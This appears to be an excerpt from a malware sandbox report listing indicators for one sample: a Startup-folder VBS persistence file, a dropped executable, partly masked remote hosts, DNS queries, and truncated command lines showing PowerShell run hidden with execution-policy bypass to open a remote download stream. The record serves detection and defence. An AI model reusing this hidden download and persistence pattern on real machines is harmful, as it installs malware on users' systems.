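Technical Information
The entries below are behavioural indicators recorded for the sample: file paths, network endpoints, DNS queries, and launched command lines. The labels that would normally group them appear to be missing from this copy.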
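- %APPDATA%\microsoft\windows\start menu\programs\startup\u.vbs (a script in the per-user Startup folder is run at each logon, so this path is a persistence location)
- %TEMP%\s.exe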
- <Full path to file>u.vbs
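- 'mi#####ft.myiphost.com':1990
- '2.###4top.net':443
- DNS ASK 2.###4top.net
- DNS ASK mi#####ft.myiphost.com
(The first two entries are written as host:port. The '#' characters in the host names appear to be masking applied by the report rather than part of the names, so these strings will not match literally in DNS or proxy logs.)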
- '%TEMP%\s.exe'
- '<SYSTEM32>\wscript.exe' "<Full path to file>u.vbs"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
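- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://2.top4to...
(The command lines above are cut off at the '...', so the full URL and the remainder of the script are not shown. The visible part shows wscript.exe running u.vbs, and PowerShell started through cmd.exe with -ExecutionPolicy Bypass and a hidden window, opening a remote stream with System.Net.WebClient. Process-creation logging with command-line capture records these arguments.)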